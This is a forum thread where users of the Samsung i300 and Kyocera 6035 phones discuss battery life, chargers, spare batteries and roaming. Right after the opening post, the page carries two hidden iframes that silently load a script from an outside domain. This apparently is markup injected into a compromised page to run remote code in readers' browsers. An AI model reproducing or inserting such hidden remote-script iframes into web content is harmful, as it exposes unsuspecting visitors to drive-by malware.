+ Reply to Thread

Question The important question...what's the battery life?

Even though I have the 6035 (for about a month now), I'm anxious to see the i300 in person. I love my 35 but will trade it in a minute for the i300's color and WOW factor! Plus the fact that I only paid $150 for the 35 new at OfficeMax makes the decision easy too.

The real question is: What's the battery life like on the i300? I have gone 6 days with normal (more Palm than phone and inet) use on the 35 without a charge.

I've heard rumors that if you use the i300 for any length of time for either the Palm side or the phone side you can expect to recharge it daily.

Is this true?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator

Arrow

ive heard folks get up to 2 days with decent use.. but you have 2 batteries and i think you wouuld be ok... especially if you get the car charger.. yuo will be fine... i have the 6035 also (since april) and the i300 does not compare to it...

FYI, there is an extended bateruy for the i300 for the same price.. its on the sprint 'site...

Wink 2 days max -- 1 to be safe

I believe that the screen is the biggest draw on the battery. So, if you are using the Palm functions a lot, then the battery charge will go down fast. I tried to get two days out of the phone when I first got it, and it ran out of juice after 30 hours. To be fair, I did a lot of out of cradle HotSyncing (via the IR). The screen is always on for this.

As my fascination with this phone wears down, I think that normal use will provide 2 days of use on one battery.

Good news. If there is not enough power left to keep the phone on, there is enough power to view the datebook, etc.

Tips... If you are going to be away from a charger for more than a day, take the second battery with you. Also, go to the preferences area, and change the "Auto-off after" time to 1 minute or 30 seconds. This should really help on reducing some unnecessary battery drain.

I also heard that turning off beam receive will extend battery life...

Brooks

Extra battery

Hey, mt. I am over here now too.

I only need one battery to make it through the day, so the other battery stays home. In order to get life out of my batteries, should I swap the two batteries once a week, leave the 2nd one out of the charger until needed, or run the first one into the ground (what a year or two?) and then use the other one?

I have just the regular batteries that ship with the unit.

To give you a sense of life. I charged it all weekend took it out of the charger Sunday night and started using it on my way to airport Monday AM. It is now 4pm on Monday and it just ran through its first battery.

I have not timed my calls but I would guess 30 mins total, and maybe another 30 mins of Palm usage. It was completely off for probably 3 hours (meetings and on my flight).

I am very dissapointed in life, I can only hope that the extended battery imporves to at least 1 day.

Also the travel charger and car chargers are on back order, so you have to lug the whole sync cradle with you if you are going out of town.

Yikes - one day of use? That's one thing that I really like about the 6035 - I can use it, seemingly, for days and days, with very little loss of battery.
    Hmm - color/battery life - I guess life is full of trade offs, n'est ce pas?

Administrator

Arrow

ab and rossman, glad to see you guys...

battery life will be les son the i300 because oif the color..

beam receiuve turned off wil reduce some drain as the system wont always be looking for a signal...

in regards to robdes post, YMMV. he could have been in an area with poor reception, thus making the phone send out a stronger signal to stay connected to the nearest tower. or could have had a great signal but need a lot of juice from the batery to keep that great signal... a lot of variables come into play here...

but i would always keep my spare battery with this phone because of the short llife... (samsung knew what they were doing when they sent us 2 batts)

yo AB,

these batteries are Li-Ion.. so you cna use either one whenever you feel like it. they have no memory so you can use one and keep the other on standby ro whatever you wish to do. that wont hurt it. the charger knws to "trickle" the voltage current when the batts near full capacity, so no worries there...

Originally posted by robdes
    I have just the regular batteries that ship with the unit.

To give you a sense of life. I charged it all weekend took it out of the charger Sunday night and started using it on my way to airport Monday AM. It is now 4pm on Monday and it just ran through its first battery.

I have not timed my calls but I would guess 30 mins total, and maybe another 30 mins of Palm usage. It was completely off for probably 3 hours (meetings and on my flight).

I am very dissapointed in life, I can only hope that the extended battery imporves to at least 1 day.

Also the travel charger and car chargers are on back order, so you have to lug the whole sync cradle with you if you are going out of town.
    Do you have roaming turned off so that you are only on the Sprint network? I think that helps. I have not tried turning off the I/R beam receive.

As a comparison (of admittedly lighter usage), I started with a full charge at 07:00. I I/R synced 3 times, made one call of a few minutes, played 3 games of Yatzee, and looked up about 3 numbers in the address book. At 17:00 I had 3 out of 3 bars.

I have turned off the IR so we will see
    Unfortunately when i need to use the phone i need to use the phone so I cannot turn off roaming I leave the phone on all day because it is my primary comm device.

Administrator

Arrow

not sure about you,

but i dont want to roam off the sprint network... 39 cents a minute i believe...

I have the roaming option which lowers the price somewhat.
    But in my business when i need to make a call i need to make a call and when my clients need me I cant ask them to wait until i am in a sprint coverag area.

hopefully the extended batteries will arrive soon.